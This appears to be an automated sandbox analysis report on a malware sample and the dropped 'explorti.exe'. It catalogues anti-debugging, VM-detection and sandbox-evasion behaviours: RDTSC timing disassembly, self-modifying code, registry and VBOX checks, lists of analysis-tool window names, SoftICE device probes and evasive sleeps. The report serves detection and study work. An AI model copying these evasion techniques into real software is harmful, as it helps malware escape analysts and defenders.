Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440501 second address: 5440505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440505 second address: 544050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 544050B second address: 544056E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F4688C1B770h 0x00000010 push FFFFFFFEh 0x00000012 jmp 00007F4688C1B770h 0x00000017 push 09B2C9E3h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F4688C1B76Dh 0x00000025 or ax, 3506h 0x0000002a jmp 00007F4688C1B771h 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 544056E second address: 54405B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 7F4B09FBh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4688C929DDh 0x00000018 and cx, 7D16h 0x0000001d jmp 00007F4688C929E1h 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 mov edi, ecx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54405B4 second address: 54405FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a call 00007F4688C1B769h 0x0000000f jmp 00007F4688C1B770h 0x00000014 push eax 0x00000015 jmp 00007F4688C1B76Bh 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4688C1B76Bh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54405FB second address: 5440618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440618 second address: 544061F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 544061F second address: 544065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b call 00007F4688C929DBh 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 call 00007F4688C929E6h 0x00000017 push eax 0x00000018 pop edx 0x00000019 pop eax 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 544065B second address: 544065F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 544065F second address: 5440665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440665 second address: 54406A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B770h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F4688C1B770h 0x0000000f mov eax, dword ptr fs:[00000000h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4688C1B777h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54406A9 second address: 54406AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54406AF second address: 54406B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54406B3 second address: 544078C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F4688C929E6h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov esi, edi 0x00000015 pushfd 0x00000016 jmp 00007F4688C929DDh 0x0000001b or al, FFFFFFC6h 0x0000001e jmp 00007F4688C929E1h 0x00000023 popfd 0x00000024 popad 0x00000025 nop 0x00000026 jmp 00007F4688C929DEh 0x0000002b sub esp, 1Ch 0x0000002e pushad 0x0000002f pushad 0x00000030 mov cl, 1Ch 0x00000032 pushfd 0x00000033 jmp 00007F4688C929E9h 0x00000038 sub cx, 4586h 0x0000003d jmp 00007F4688C929E1h 0x00000042 popfd 0x00000043 popad 0x00000044 pushfd 0x00000045 jmp 00007F4688C929E0h 0x0000004a add cx, 8828h 0x0000004f jmp 00007F4688C929DBh 0x00000054 popfd 0x00000055 popad 0x00000056 xchg eax, ebx 0x00000057 jmp 00007F4688C929E6h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 544078C second address: 5440792 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440792 second address: 54407E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F4688C929E6h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov ecx, edx 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F4688C929E6h 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007F4688C929DCh 0x00000023 pop ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54407E9 second address: 54407F8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cl, bl 0x00000008 popad 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54407F8 second address: 5440837 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 34ED4AA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F4688C929E5h 0x00000014 adc eax, 5B01D476h 0x0000001a jmp 00007F4688C929E1h 0x0000001f popfd 0x00000020 mov ch, 0Fh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440837 second address: 5440854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B779h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440854 second address: 54408C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F4688C929DDh 0x0000000e mov eax, dword ptr [76FBB370h] 0x00000013 jmp 00007F4688C929DEh 0x00000018 xor dword ptr [ebp-08h], eax 0x0000001b pushad 0x0000001c mov eax, 544A8F7Dh 0x00000021 call 00007F4688C929DAh 0x00000026 push eax 0x00000027 pop edi 0x00000028 pop ecx 0x00000029 popad 0x0000002a xor eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F4688C929DFh 0x00000035 jmp 00007F4688C929E3h 0x0000003a popfd 0x0000003b push ecx 0x0000003c pop edx 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54408C0 second address: 54408EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007F4688C1B76Ch 0x0000000c sub esi, 3667A318h 0x00000012 jmp 00007F4688C1B76Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Special instruction interceptor: First address: 1CEE25 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Special instruction interceptor: First address: 1CEEFF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Special instruction interceptor: First address: 363775 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Special instruction interceptor: First address: 38FF78 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Special instruction interceptor: First address: 1CEDF9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Special instruction interceptor: First address: 3F3B3C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: EFEE25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: EFEEFF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: 1093775 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: 10BFF78 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: EFEDF9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Special instruction interceptor: First address: 1123B3C instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

Code function: 0_2_05490C90 rdtsc

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Thread delayed: delay time: 180000

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Window / User API: threadDelayed 364

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1396	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1396	Thread sleep time: -64032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8184	Thread sleep time: -60030s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156	Thread sleep count: 364 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156	Thread sleep time: -10920000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5924	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8176	Thread sleep time: -52026s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8172	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8172	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1104	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1104	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8156	Thread sleep time: -30000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: explorti.exe, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000007.00000002.2880581504.00000000006FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: explorti.exe, 00000007.00000002.2880581504.0000000000729000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: gNo9ad9KO4.exe, 00000000.00000002.1680292366.0000000000344000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1706138398.0000000001074000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1720919181.0000000001074000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

System information queried: ModuleInformation

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

Process information queried: ProcessInformation

Hides threads from debuggers

Anti Debugging

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

Code function: 0_2_05490C90 rdtsc

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00EC643B mov eax, dword ptr fs:[00000030h]		7_2_00EC643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00ECA1A2 mov eax, dword ptr fs:[00000030h]		7_2_00ECA1A2

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"

Contains functionality to query CPU information (cpuid)

Source: explorti.exe, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: yHProgram Manager

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Code function: 7_2_00EAD2E8 cpuid

7_2_00EAD2E8

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation